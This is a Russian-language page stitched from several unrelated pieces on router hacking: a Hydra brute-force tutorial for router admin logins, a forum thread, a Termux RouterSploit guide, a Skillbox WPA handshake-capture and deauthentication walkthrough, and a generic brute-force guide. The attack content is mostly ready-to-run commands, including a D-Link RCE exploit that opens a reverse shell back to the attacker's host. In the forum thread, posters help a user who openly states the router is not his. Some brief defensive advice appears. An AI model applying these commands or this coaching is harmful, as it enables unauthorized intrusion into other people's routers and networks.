Как взломать админ панель роутера

Взлом «админки» роутера

Время на прочтение
4 мин

Количество просмотров 274K

*Здесь могло быть предупреждение о том, что не нужно пользоваться данной программой в преступных целях, но hydra это пишет перед каждым сеансом взлома*

image

В общем, решил я по своим нуждам покопаться в настройках роутера, вбиваю я всем знакомый адрес, а тут пароль спрашивают. Как быть? Ну, начал я перебирать пароли, а их количество слишком большое, что бы перебирать все и слишком маленькое, чтобы делать reset.

И я открыл google. После пары запросов я узнал о такой вещи как hydra. И тут началось: жажда открытий, поиски неизведанного и так далее.

Приступим

Первым делом мной был составлен словарь паролей, ни много, ни мало, аж на 25 комбинаций. Далее качаем либо Kali linux, либо саму Гидру (если

вы пингвин

у вас линукс). Теперь у нас два варианта (ну как два, я нашел информацию по двум вариантам).

Либо у вас вот такое диалоговое окно:

image

Либо логин и пароль запрашивает форма на сайте. Мой вариант первый, поэтому начнем с него. На нашем пути к «админке» стоит страж в виде диалогового окна. Это вид авторизации http-get.

Открываем терминал. Вводим:

hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get /

Где после «-l» идет логин, после «-P» словарь, после «-s» порт. Также в нашем распоряжении есть другие флаги:

-R восстановить предыдущую прерванную/оборванную сессию

-S выполнить SSL соединение

-s ПОРТ если служба не на порту по умолчанию, то можно задать порт здесь

-l ЛОГИН или -L ФАЙЛ с ЛОГИНАМИ (именами), или загрузить несколько логинов из ФАЙЛА

-p ПАРОЛЬ или -P ФАЙЛ с паролями для перебора, или загрузить несколько паролей из ФАЙЛА

-x МИНИМУМ: МАКСИМУМ: НАБОР_СИМВОЛОВ генерация паролей для брутфорса, наберите «-x -h» для помощи

-e nsr «n» — пробовать с пустым паролем, «s» — логин в качестве пароля и/или «r» — реверс учётных данных

-u зацикливаться на пользователя, а не на парлях (эффективно! подразумевается с использованием опции -x)

-C ФАЙЛ формат где «логин: пароль» разделены двоеточиями, вместо опции -L/-P

-M ФАЙЛ список серверов для атак, одна запись на строку, после двоеточия ‘:’ можно задать порт

-o ФАЙЛ записывать найденные пары логин/пароль в ФАЙЛ вместо стандартного вывода

-f / -F выйти, когда пара логин/пароль подобрана (-M: -f для хоста, -F глобально)

-t ЗАДАЧИ количество запущенных параллельно ЗАДАЧ (на хост, по умолчанию: 16)

-w / -W ВРЕМЯ время ожидания ответов (32 секунды) / между соединениями на поток
-4 / -6 предпочитать IPv4 (по умолчанию) или IPv6 адреса

-v / -V / -d вербальный режим / показывать логин+пароль для каждой попытки / режим отладки

-q не печатать сообщения об ошибках соединения

-U подробные сведения об использовании модуля
server цель: DNS, IP или 192.168.0.0/24 (эта ИЛИ опция -M)
service служба для взлома (смотрите список поддерживаемых протоколов)
OPT некоторые модули служб поддерживают дополнительный ввод (-U для справки по модулю)

Ну вот так как-то:

image

Второй вариант:

Не мой, честно взят с Античата, с исправлением грамматических ошибок автора (Обилие знаков пунктуации я оставил). Интересно это можно считать переводом?

Нас встречает форма на сайте:

image

Такой метод авторизации — http-post-form, и тут нужно немного повозится, так как нам нужно понять, как браузер отправляет роутеру данные.

В данном случае и использовал браузер Chrome (его аналог Chromium в Kali Linux, ставится через apt-get install chromium).

Сейчас нужно сделать одну очень глупую вещь… указать неверный логин и пасс…
для чего увидим позже…

Нажимаем F12 что бы перейти в режим редактирования веб-страницы.

image

Переходим в Network → Включаем галочку Preserv log.

image

Вводим ложные логин и пароль…

image

Ну что за дела? Так не пойдет! Более того, после нескольких неудачных попыток входа, форма блокируется на 180 секунд.

Переходим во вкладочку HEADERS ищем строку:

 Request URL:http://192.168.0.1/index.cgi

Отрезаем все до ip-адреса — /index.cgi… Поздравляю мы нашли первую часть скрипта авторизации… Идем дальше… Переходим к вкладке FORM DATA и изменяем режим отображения на VIEV SOURCE.

image

image

update_login=login&update_password=password&check_auth=y&tokenget=1300&
update_login=login&update_password=password 

Бинго! Мы нашли вторую часть скрипта авторизации! Еще чуть-чуть! теперь нужно найти страницу с сообщением об ошибке… Нужно нажать на вкладку ELEMENTS.

image

И выбрать элемент HTML кода (CTRL+SHIFT+C) и выбрать окно с сообщением об ошибки… в данном случае — Authentication failed!

image

<span langkey="bad_auth" style="display: inline;">Authentication failed!</span>

Выбираем:

span langkey="bad_auth"

и немножко правим… bad_auth — все! Ключ практически у нас в кармане… Теперь мы можем полностью написать строку авторизации:

index.cgi:update_login=login&update_password=password:bad_auth 

Теперь нужно подставить вместо «login» — ^USER^ и вместо «password» ^PASS^ и тогда строка будет иметь вид:

index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth 

Вводим команду:

hydra -l admin -P router-pass.dic -t 1 -e nsr -vV -f -s 80 192.168.0.1 http-post-form "/index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth"

Обратите внимание что между частями скрипта двоеточие! это обязательно! Кстати, блокировки формы через гидру не происходило… Это очень радует.

image

В работоспособности второго метода мне убедиться не светит, так как я не обладатель подходящей модели роутера. Придется довериться экспрессивному человеку с Античата.

Если кому интересно, будьте добры, проверьте и отпишитесь в комментариях. Я работал с роутером TL-WR1043N/TL-WR1043ND. Роутер с Античата — D-link300NRU.

Спасибо за внимание!

Valkiria


  • #2

Обойти авторизацию ?
Ты имеешь ввиду, что окно автризации не должно показываться и беспокоить тебя своим присутствием ?
Ты хочешь войти в WEB-интерфейс роутера точно так-же как на любой публичный сайт ?

Tayrus


  • #3

Обойти авторизацию ?
Ты имеешь ввиду, что окно автризации не должно показываться и беспокоить тебя своим присутствием ?
Ты хочешь войти в WEB-интерфейс роутера точно так-же как на любой публичный сайт ?

Веб морду, т.e у меня

Ссылка скрыта от гостей

, мы туда заходим и нас просят логин:пароль чтобы войти туда, пароль я не знаю

Valkiria


  • #4

Ответ на твой вопрос невозможно дать однозначно.
Это твой роутер или тебе нужно порлучить доступ на чужой ?
Имеешь ли ты физический доступ к роутеру ?
Если роутер чужой и удалённый, то какие меры были предприняты для взлома ?

Вот от этих ответов во многом зависит ответ на твой первостепенный вопрос.

Tayrus


  • #5

Ответ на твой вопрос невозможно дать однозначно.
Это твой роутер или тебе нужно порлучить доступ на чужой ?
Имеешь ли ты физический доступ к роутеру ?
Если роутер чужой и удалённый, то какие меры были предприняты для взлома ?

Вот от этих ответов во многом зависит ответ на твой первостепенный вопрос.

Нет не мой(Все в рамках закона))) физ.доступ не имею, через WPS хекнул

Valkiria


  • #6

Если ты имеешь доступ к роутеру только через Интернет, то пробуй брутфорсить программой Hydra или Patator.
Если ты находишься в радиусе действия Wi-Fi этого роутера, то пробуй взломать соответственно через Wi-Fi.

Tayrus


  • #7

Если ты имеешь доступ к роутеру только через Интернет, то пробуй брутфорсить программой Hydra или Patator.
Если ты находишься в радиусе действия Wi-Fi этого роутера, то пробуй взломать соответственно через Wi-Fi.

У меня есть пароль от сетки, брутфорс тут увы не поможет, «пробуй взломать соответственно через Wi-Fi» как это можно осуществить?

Valkiria


  • #8

О взломе роутеров через Wi-Fi написаны терабайты информации.
Тебе нужно немного подтянуть теорию )

Tayrus


  • #9

О взломе роутеров через Wi-Fi написаны терабайты информации.
Тебе нужно немного подтянуть теорию )

Я знаю только о существовании сайта routerpwn.com, помогите если не сложно, дайте ссылки на информацию(гуглом пользоваться я умею, увы не нашёл, может слепой/)

  • #10

Я знаю только о существовании сайта routerpwn.com, помогите если не сложно, дайте ссылки на информацию(гуглом пользоваться я умею, увы не нашёл, может слепой/)

vzlom-wi-fi
https://codeby.net/category/vzlom-wifi/

Valkiria


  • #11

Я знаю только о существовании сайта routerpwn.com, помогите если не сложно, дайте ссылки на информацию(гуглом пользоваться я умею, увы не нашёл, может слепой/)

Чтобы хоть как-то помочь тебе советом, ты ДОЛЖЕН обрисовать ситуацию до мелочей.
А я всю эту тему тем и занималась, что вытягивала по крупицам хоть что-то ))
У меня уже пальцы в мозолях от твоей тугодумности.

Может быть тебе проще спросить пароль у владельца роутера ?

Remir


  • #12

гуглом пользоваться я умею, увы не нашёл

И как же ты искал, если за запрос тут же выходит куча ответов?

Ссылка скрыта от гостей

И зачем лезть куда-то, когда здесь это информации хоть отбавляй! Подсказываю: тут есть такая кнопочка и называется она «Поиск».

11.JPG

Введи туда «взлом роутера» и получишь

https://codeby.net/search/108310/?q=взлом+роутера&o=relevance

Tayrus


  • #13

Чтобы хоть как-то помочь тебе советом, ты ДОЛЖЕН обрисовать ситуацию до мелочей.
А я всю эту тему тем и занималась, что вытягивала по крупицам хоть что-то ))
У меня уже пальцы в мозолях от твоей тугодумности.

Может быть тебе проще спросить пароль у владельца роутера ?

Хорошо опишу все, у меня стоит задача получить контроль над роутером, т.е web интерфейс его(роутера) получить, чтобы я мог что-то изменить(ну к примеру перепрошить, пароль поменять и т.п) и так я получил пароль от сети и при подключении к 191.168.1.1 просит логин;пароль, стандартные все попробовал неудача, зайти в зону wi fi я могу(ну где роутер) я могу его даже увидеть, но физически контактировать никак, производитель Tp-Link, модель не знаю надеюсь теперь тебе понятна картина.
[doublepost=1513017854,1513017459][/doublepost]

И как же ты искал, если за запрос тут же выходит куча ответов?
***Скрытый текст***’]

Ссылка скрыта от гостей

роутера через wifi[/URL]

И зачем лезть куда-то, когда здесь это информации хоть отбавляй! Подсказываю: тут есть такая кнопочка и называется она «Поиск».

Посмотреть вложение 13803

Введи туда «взлом роутера» и получишь

https://codeby.net/search/108310/?q=взлом+роутера&o=relevance

Мне это ничем не помогло

Remir


  • #14

За 7 минут успел все прочитать? Ух ты! Молодчина!

Извини, но тогда, пожалуй, тебе никто не поможет. :)

Valkiria


  • #15

Мне кажется, что тебе может помочь вот такая уязвимость этой модели.

Ссылка скрыта от гостей

Tayrus


  • #16

Мне кажется, что тебе может помочь вот такая уязвимость этой модели.

Ссылка скрыта от гостей

Спасибо, завтра попробую
[doublepost=1513018512,1513018478][/doublepost]

За 7 минут успел все прочитать? Ух ты! Молодчина!

Извини, но тогда, пожалуй, тебе никто не поможет. :)

По оглавлении читал, что соответствовало моей проблеме читал

Dr.Lafa


kot-gor


  • #18

Добрый вечер.
Какие в роутере открыты порты? Вы сканировали роутер на сервисы?

g0llum


Rollly


  • #20

Дай ip роутера, попробуй эксплоитом пробить.

Взлом админ панели Wi-Fi роутера

Termux, please

Все действия мы будем производить с помощью Termux. Для взлома роутеров есть подобная программа — «RouterSploit». Она также, как и Metasploit, позволяет эксплуатировать уязвимости, но только у Wi-Fi роутеров.

Прежде чем устанавливать и запускать RouterSploit нужно прописать следующие команды:

apt update & upgrade
apt install git
apt install bash
apt install python
pip install futureapt
apt install git figletgit
git clone https://github.com/41Team/RoutersploitTermux

Переходим в папку RoutersploitTermux командой:

cd RoutersploitTermux

Запускаем процесс установки:

bash run.sh

По окончанию, появится такое сообщение:

[​IMG]

Процесс установки занимает довольно продолжительное время, примерно 20-30 минут.

Давайте же запустим наш RouterSploit и протестируем его:

ls
cd routersploit
python rsf.py

После запуска появится следующее:

[​IMG]

Данная программа содержит множество эксплойтов для разных моделей роутеров: D-Link, TP-Link, Huawei, Cisco и т.д. Список всех содержащихся эксплойтов можно посмотреть, прописав команду:

show all

Чтобы проверить, можно ли с помощью какого-либо из имеющихся эксплойтов взломать роутер, пишем:

use scanners/autopwn
set target <ip роутера>, например set target 192.168.1.1
exploit

Если же роутер содержит ту или иную уязвимость, Вы увидите следующее:

Чтобы применить эксплойт прописываем:

use exploits/router/dlink/dsl_2750b_rce
set target <ip роутера>
check
run
set payload reverse_tcp
set lhost <Ваш IP>
run

После этого появится сообщение, Взлом прошел успешно.

Конец!

Спасибо за прочтение!

  • ✅Основной канал — https://t.me/under_public
  • 🏴‍☠️ Приватный канал — https://t.me/joinchat/AAAAAEmM-bkL9Pv7KLyL7w
  • 🛒HackAli — cамые интересные хакерские товары с Aliexpress!
  • 👨‍💻Termux, please — 100% termux
  • 🐧Linux, please — всё о Linux
  • 🌐TG-канал форума: https://t.me/darksploit0x41
  • Наш форум: https://darksploit.su/
  • Чат — https://t.me/UnderChats

Также вы можете присылать ваши статьи в бота (оформляйте в телеграфе), я их просмотрю, если всё ОК — опубликую статью на канале с указанием автора.

#статьи


  • 0

Показываем, как взломать ваш роутер за 2–3 часа. Будьте бдительны!

Редакция «Код» Skillbox Media

Онлайн-журнал для тех, кто влюблён в код и информационные технологии. Пишем для айтишников и об айтишниках.

В многоквартирных домах теснятся не только люди, но и множество маршрутизаторов. Получить доступ к соседскому Wi-Fi проще простого — достаточно знать пароль устройства. Обычные пользователи даже не догадываются, что у них проблемы с безопасностью и их роутеры прямо сейчас атакуют главную страницу «Яндекса».

Чтобы защититься от злоумышленников, нужно думать как злоумышленник. Поэтому попробуем взломать Wi-Fi. Практиковаться будем на своём роутере — мы же против нарушения законов! Попросите домашних изменить на нём пароль и не говорить вам.

Готово? Теперь у вас есть мотивация, цель и подробная инструкция.

Что нужно уметь?

  1. Установить Linux и работать с ОС на уровне рядового пользователя.
  2. Запускать терминал и выполнять простейшие команды.

Инструменты

  1. Kali Linux. Подойдёт любой дистрибутив Linux, но на Kali предустановлен необходимый софт.
  2. Wi-Fi-адаптер. Встроенный или внешний USB — разницы нет. Но есть нюансы, о которых поговорим далее.
  3. Aircrack-ng. Набор утилит для обнаружения Wi-Fi-сетей, анализа и перехвата трафика. Идёт в поставке Kali Linux.

Прежде чем надевать на голову чулок или балаклаву, нужно понять, как работает роутер. Для этого нужно немного вспомнить курс школьной физики. Беспроводной девайс ловит электромагнитные волны от ноутбука или смартфона, расшифровывает их, а полученные запросы отправляет в интернет через кабель.

Но чтобы обмениваться с роутером информацией, его надо как-то обнаружить — он же не кричит о себе на весь дом. Тут поможет… бекон.

Beacon frame — это пакет, который роутер рассылает, чтобы сообщить о себе. Смартфоны и другие пользовательские устройства периодически сканируют радиоканал и ловят «беконы». Они переключаются в режим монитора и выводят обнаруженные пакеты — это и есть доступные точки подключения.

После того как устройство обнаружило роутер, подключаемся. Давайте заглянем в этот процесс и познакомимся с терминами. Будем считать, что подключаемся через смартфон.

Если наш смартфон знает пароль, то передаёт его автоматически, если нет — роутер спрашивает его у нас. Во время подключения смартфон и роутер обмениваются «рукопожатием» (handshake).

Handshake — процесс знакомства клиента и сервера, во время которого устройства идентифицируют друг друга и обмениваются секретными ключами. Handshake происходит каждый раз, когда мы подключаемся к серверу.

После «рукопожатия» смартфон переключается на рабочий канал и безопасно работает с роутером.

Канал — рабочая частота, на которой устройства обмениваются данными. У роутеров обычно от 1 до 15 каналов.

Теперь устройства доверяют друг другу, а у вас есть доступ в интернет.

Составим план взлома. Мы получим доступ к маршрутизатору в четыре шага:

  1. Найдём устройства с помощью Aircrack-ng.
  2. Выберем роутер и послушаем его трафик в ожидании handshake. Защита промышленных моделей наподобие Cisco, MikroTik может быть гораздо серьёзнее, и выполнить трюк будет сложнее.
  3. Возможно, дополнительно отправим сигнал отключения от точки для клиентских устройств, чтобы ускорить процесс.
  4. Перехватим handshake, расшифруем методом брутфорса и получим пароль.

Брутфорс — метод простого перебора паролей. Он примитивен и работает в лоб, поэтому и называется методом грубой силы. Это как если бы человек загадал трёхзначное число, а вы бы пытались его угадать, называя все числа от 100 до 999.

Плюсы нашей атаки:

  • роутер со стандартными настройками — лёгкая цель;
  • довольно простая реализация.

Минусы:

  • Перебор возможных паролей может занять много времени — его количество зависит от мощности машины и длины словаря. В среднем на пароль из 8 цифр уходит более 8 часов.
  • Если точкой никто не пользуется, то и handshake перехватить не получится: нет подключений, а значит, и нужных нам данных.

Не все адаптеры годятся для нашего плана. Нам нужен такой, у которого есть режим монитора и режим инъекции. Это аппаратные методы для одновременного анализа всех точек вокруг и перехвата чужих пакетов информации. Чтобы узнать, поддерживает ли ваше устройство такие режимы, нужно определить модель чипсета. Её можно найти в интернете по модели адаптера или с помощью команд:

  • lspci | grep «Network» — для встроенных адаптеров;
  • lsusb — для внешних устройств.

По названию ищем в поисковике информацию о чипсете. Нам нужно найти, поддерживает ли он monitor mode и packet injection.

Можно сразу искать чипсет на сайте, но там может не быть нужных данных.

Нам нужно узнать, как в системе именуется наше Wi-Fi-устройство. Запускаем терминал нажатием клавиш Ctrl + Alt + T и выполняем команду iwconfig для просмотра всех беспроводных адаптеров.

В моём случае найдено два устройства: wlx1cbfce4e2375 — внешний USB-адаптер и Wlp10s0 — встроенный.Чтобы проверить, способно ли устройство участвовать в атаке, нужно узнать его название. Встроенное — Realtek Semiconductor Co., Ltd. RTL8821CE — не поддерживает режим монитора и инъекции. А внешнее Ralink Technology, Corp. MT7601U Wireless Adapter — поддерживает. Его и будем использовать.

Нам необходимо переключить адаптер в режим монитора, в котором устройство анализирует весь беспроводной трафик вокруг себя.

Используем следующие команды:

sudo airmon-ng check kill

sudo airmon-ng start wlan0

Что делают:

  1. Выключают процессы, которые мешают работе с адаптером беспроводной сети.
  2. Включают режим монитора.

При запуске режима монитора утилита обнаружила, что моя карта заблокирована, и предложила выполнить команду для разблокировки. Выполняем команду.

Далее она автоматически переименовала длинное и странное имя адаптера в более простое. Теперь моя сеть мониторинга называется wlan0mon.

Нужно осмотреться! Запускаем утилиту Airodump-ng и мониторим сети.

sudo airodump-ng wlan0mon

Сверху у нас подробная таблица с точками доступа, а внизу — клиенты. Наша сеть — TP-Link_77D0, из таблицы узнаём её BSSID и CH-канал.

Переключаем наш адаптер в режим работы с этой точкой. Теперь утилита анализирует трафик точки и её клиентов. Лучше открыть дополнительный терминал для этих целей.

sudo airodump-ng wlan0 —channel 1 -w mycap

С помощью команды переключаем адаптер на канал 1. В случае поимки handshake данные сохраняются в файл с названием mycap. Он находится в папке, в которой запущен терминал.

Можно ничего не делать и ждать, когда рыба сама клюнет. Как только захватим handshake, сообщение «fixed channel wlan0:» сменится на «WPA handshake B0:BE: 76:A9:77:D0».

Чтобы ускорить процесс, можно подкинуть «наживки». Клиенты, подключенные к точке, могут отключиться, если мы отправим им соответствующий сигнал — пакет деаутентификации. Это вынудит клиента вновь обменяться handshake с атакуемым устройством.

Пакеты деаутентификации используются для исправления ошибок, обновления ключей и так далее. Они передаются незашифрованными, поэтому утилита может их подделать. Когда целевое устройство получит пакет деаутентификации, оно вынуждено отключиться от роутера.

С помощью команды отправляем 100 пакетов всем клиентам указанной сети.

sudo aireplay-ng -0 100 -a B0:BE: 76:A9:77:D0 wlan0

«-0» — это пакет деаутентификации, «100» — количество пакетов, «-a» — цель атаки, а «wlan0mon» — наш монитор.

И, вуаля, мы поймали рыбку! Зашифрованный пароль теперь в файле mycap.cap. Об этом говорит надпись «WPA handshake B0:BE: 76:A9:77:D0» в левом верхнем углу.

Пароль уже почти у нас. Осталось расшифровать полученный handshake. Сделать это несложно, но ресурсозатратно. Брутфорс требует больших мощностей и много времени.

Тут есть два пути.

Простой. Воспользоваться сайтами, которые расшифровывают данные. Их можно найти в поисковике по запросу «handshake decrypt online». У некоторых сервисов есть бесплатные тарифы, но обычно они берут небольшую сумму — выходит не дороже чашки кофе.

Сложный. Использовать специальный софт и подключать драйвера, которые будут использовать центральный процессор вместе с графическим для ускорения вычислений. Можно воспользоваться aircrack-ng — у неё есть модуль для расшифровки — или утилитой hashcat. Первая утилита содержит базовый набор функций, вторая — более серьёзный и расширенный.

Мы реализовали простую атаку на домашний роутер. Самое главное: мы научились не только взламывать чужие устройства, но и защищать свои:

  1. Не используйте стандартные слабые пароли. Для пароля из 8 цифр количество возможных комбинаций равно 134217728. Мощный компьютер расшифрует его довольно быстро. Но если добавить хотя бы одну латинскую букву, то количество вариантов возрастёт до 1.0633823966279327e+37, а шансы злоумышленников резко уменьшатся.
  2. Не использовать название модели роутера в имени сети. Зная модель роутера, злоумышленник может воспользоваться известными уязвимостями устройства. Например, для роутера TP-Link TL-WR840N есть эксплойт, позволяющий обойти аутентификацию. Кроме того, если вы не меняли пароль, взломщик может выяснить, какие заводские пароли использует роутер.
  3. Отключать обнаружение сети. Подключиться к такому устройству сложнее — придётся прописывать настройки вручную.
  4. Использовать фильтр подключений в роутере, который разрешает подключаться только известным устройствам. Даже если злоумышленник расшифрует пароль, фильтр не пропустит его в сеть.

Если хотите научиться защищать от хакерских атак не только домашние, но большие корпоративные сети, приходите на курс. «Специалист по кибербезопасности». Здесь студенты узнают о новых способах атак, учатся строить защиту, а лучшим мы помогаем с трудоустройством.

Жизнь можно сделать лучше!
Освойте востребованную профессию, зарабатывайте больше и получайте от работы удовольствие. А мы поможем с трудоустройством и важными для работодателей навыками.

Посмотреть курсы

В мире Интернета безопасность является одним из главных вопросов. Роутер – это устройство, которое обеспечивает соединение с Интернетом и защищает вашу домашнюю сеть. Но что делать, если вы потеряли доступ к административной панели своего роутера? В этой статье мы расскажем вам о том, как взломать админку роутера с помощью брутфорса.

Брутфорс – это метод, который использует перебор всех возможных комбинаций паролей для взлома защищенной системы. Этот метод может быть успешен, если у вас есть некоторая информация о роутере и его настройках. Однако, следует помнить, что взлом чужого роутера без разрешения владельца является преступлением, и это может повлечь за собой серьезные юридические последствия.

Важно отметить, что взлом админки роутера должен быть произведен только в легальных целях, например, если вы являетесь владельцем роутера, но забыли или потеряли пароль от административной панели.

Первым шагом взлома админки роутера является сбор основной информации о роутере. Вам понадобится знать IP-адрес роутера, модель и производителя. Эту информацию можно найти на самом роутере или в его документации. Далее, вам понадобится программа для брутфорса паролей. Существует множество различных инструментов и программ, которые вы можете использовать для этой цели.

Содержание

  1. Выбор подходящего инструмента
  2. Подбор правильного словаря паролей
  3. Настройка программы для брутфорса
  4. Запуск и контроль процесса
  5. Успешное подбор пароля
  6. Защита от брутфорса и взлома

Выбор подходящего инструмента

Перед тем как начать брутфорс административной панели роутера, необходимо выбрать подходящий инструмент. Существует множество программ и скриптов, специально разработанных для проведения таких атак.

Один из наиболее популярных инструментов — Hydra. Hydra является мощным и гибким инструментом для брутфорса, который поддерживает множество протоколов и сервисов, включая HTTP, HTTPS, FTP, SMTP, Telnet и другие.

Еще один популярный инструмент — Ncrack. Ncrack также предоставляет широкие возможности для брутфорса и поддерживает множество протоколов, таких как SSH, RDP, Telnet, FTP, HTTP и другие.

Кроме того, есть и другие инструменты, такие как Medusa, THC-Hydra, Patator и многие другие. Рекомендуется изучить характеристики каждого инструмента и выбрать тот, который лучше всего подходит для вашей конкретной задачи.

Подбор правильного словаря паролей

Вот некоторые рекомендации для составления эффективного словаря паролей:

  • Включите в словарь самые популярные пароли, такие как «password», «123456», «admin» и другие, которые люди часто используют;
  • Добавьте словарь из общедоступных логинов и паролей, который можно найти в сети Интернет;
  • Учтите особенности региона или компании, чьи роутеры вы собираетесь взломать. Например, если речь идет о компании, специализирующейся на производстве спортивного оборудования, можно добавить пароли, связанные со спортом, физической активностью или известными спортсменами;
  • Не забудьте о включении паролей, содержащих комбинации цифр и букв разного регистра;
  • Один из самых важных моментов — включение сиквенциальных или инкрементных паролей в словарь. Некоторые пользователи предпочитают использовать пароли, состоящие из последовательности чисел или букв, таких как «12345678» или «abcdefgh». Подобные пароли могут быть быстро подобраны при помощи брутфорса;

Запомните, что правильный словарь паролей имеет решающее значение для успешного взлома админки роутера. Отсутствие ключевых паролей в вашем словаре может привести к неудаче, поэтому следует уделить должное внимание этому этапу подготовки перед запуском брутфорс атаки.

Настройка программы для брутфорса

Для начала, нужно установить Hydra на вашем компьютере. Вы можете найти его в открытом доступе и загрузить с официального сайта.

После установки Hydra, откройте командную строку и перейдите в каталог, где установлена программа. Затем введите команду, чтобы проверить, что Hydra корректно установлен:

hydra

Если появляется информация о версии Hydra и доступных командах, значит программа успешно установлена и готова к использованию.

Теперь, необходимо указать Hydra параметры для брутфорса админки роутера. Введите следующую команду:

hydra -l admin -P passwords.txt -s СОКЕТ IP http-get

Где:

  • -l admin — это логин, который мы будем использовать для попыток входа в админку роутера. Вместо «admin» вы можете указать другой логин, если у вас есть соответствующая информация.
  • -P passwords.txt — это файл, который содержит список паролей. Вам нужно создать файл «passwords.txt» и добавить в него все возможные пароли, которые могут быть использованы для входа в админку роутера.
  • -s СОКЕТ IP — это адрес роутера, который вы хотите взломать. Вместо «СОКЕТ IP» необходимо указать IP-адрес вашего целевого роутера.
  • http-get — это метод атаки, который Hydra будет использовать для брутфорса. В данном случае, мы будем использовать метод «http-get», так как админка роутера обычно доступна по протоколу HTTP.

После настройки Hydra, вы готовы приступить к атаке брутфорса на админку роутера. Обратите внимание, что это незаконная деятельность, которая может повлечь юридические последствия. Пожалуйста, используйте эту информацию только в образовательных целях и с согласия владельца роутера.

Запуск и контроль процесса

После того, как вы установили необходимое программное обеспечение и загрузили скрипт для брутфорса, вы готовы запустить процесс взлома админки роутера. Важно следовать определенным шагам и контролировать процесс, чтобы достичь желаемого результата.

Вот основные шаги, которые вам нужно выполнить:

  1. Откройте командную строку или терминал на устройстве, на котором установлено программное обеспечение для брутфорса. Введите команду, которая запустит скрипт, например:

    python bruteforce_script.py

  2. Укажите параметры для брутфорса, такие как IP-адрес целевого роутера и список возможных паролей. Введите эти данные в командной строке. Например:

    --target 192.168.0.1 --passwords passwords.txt

  3. Нажмите клавишу «Enter», чтобы запустить процесс брутфорса. Скрипт начнет перебирать все возможные комбинации паролей и попытается взломать админку роутера.

  4. Во время процесса брутфорса важно следить за выводом в командной строке или терминале. Скрипт будет выводить информацию о текущем статусе взлома и о том, какие пароли уже были проверены. Если скрипт найдет успешное сочетание логина и пароля, он выведет сообщение о том, что админка роутера была успешно взломана.

  5. Если процесс брутфорса занимает слишком много времени или вы не получаете желаемых результатов, вы можете попробовать изменить некоторые параметры, например, увеличить число потоков или использовать другой список возможных паролей.

Важно отметить, что взлом админки роутера без разрешения владельца является незаконной деятельностью и может повлечь за собой юридические последствия. Данная статья предназначена только для информационных целей и не призывает к нарушению закона.

Успешное подбор пароля

Когда процесс брутфорса роутера завершается успешно, это означает, что злоумышленнику удалось подобрать правильный пароль администратора. Есть несколько способов определить, что пароль был успешно подобран:

1. Авторизация в админке

Один из самых очевидных признаков успешного подбора пароля — возможность авторизоваться в административной панели роутера. После ввода правильного пароля, злоумышленнику становится доступен полный контроль над настройками и функциями роутера.

2. Наличие лог файлов

Многие роутеры ведут логи активности, включая попытки входа в административную панель. Успешный подбор пароля будет зарегистрирован в лог-файлах, и злоумышленник может обнаружить соответствующую запись.

3. Изменение настроек

После успешного подбора пароля, злоумышленник может изменить настройки роутера по своему усмотрению. Он может, например, перенаправить трафик через прокси-сервер или запретить доступ к определенным сайтам или сервисам.

Как только злоумышленник успешно подобрал пароль, рекомендуется принять незамедлительные меры для обеспечения безопасности. Это может включать смену пароля администратора, обновление прошивки роутера или уведомление интернет-провайдера о произошедшем инциденте.

Защита от брутфорса и взлома

Для защиты от брутфорса и взлома админки роутера, необходимо принять несколько мер предосторожности:

  1. Измените стандартный логин и пароль администратора роутера на надежные и уникальные комбинации символов.
  2. Обновляйте прошивку роутера регулярно, чтобы исправить возможные уязвимости и улучшить безопасность устройства.
  3. Отключите удаленный доступ к административной панели роутера, если это не требуется.
  4. Включите функцию блокировки IP-адресов при многократных неудачных попытках входа, чтобы ограничить возможность брутфорса.
  5. Используйте сильные пароли для Wi-Fi сети и роутера, содержащие цифры, буквы разного регистра и специальные символы.
  6. Настройте брандмауэр роутера для блокировки нежелательного трафика из внешней сети.
  7. Помимо стандартного логина и пароля, можно использовать дополнительный уровень аутентификации, например, двухфакторную верификацию.
  8. Используйте VPN (виртуальную частную сеть) для защищенного удаленного доступа к административной панели роутера.
  9. Никогда не делитесь логином и паролем администратора роутера с посторонними лицами.
  10. Имейте в виду, что любые подключенные к роутеру устройства также должны быть защищены паролями и обновлениями прошивки.

  • Как вернуть роутер к заводским настройкам тенда
  • Как вести код на роутер
  • Как включить 2 канала на роутере
  • Как включить dfs в роутере
  • Как вернуть роутер к заводским настройкам netis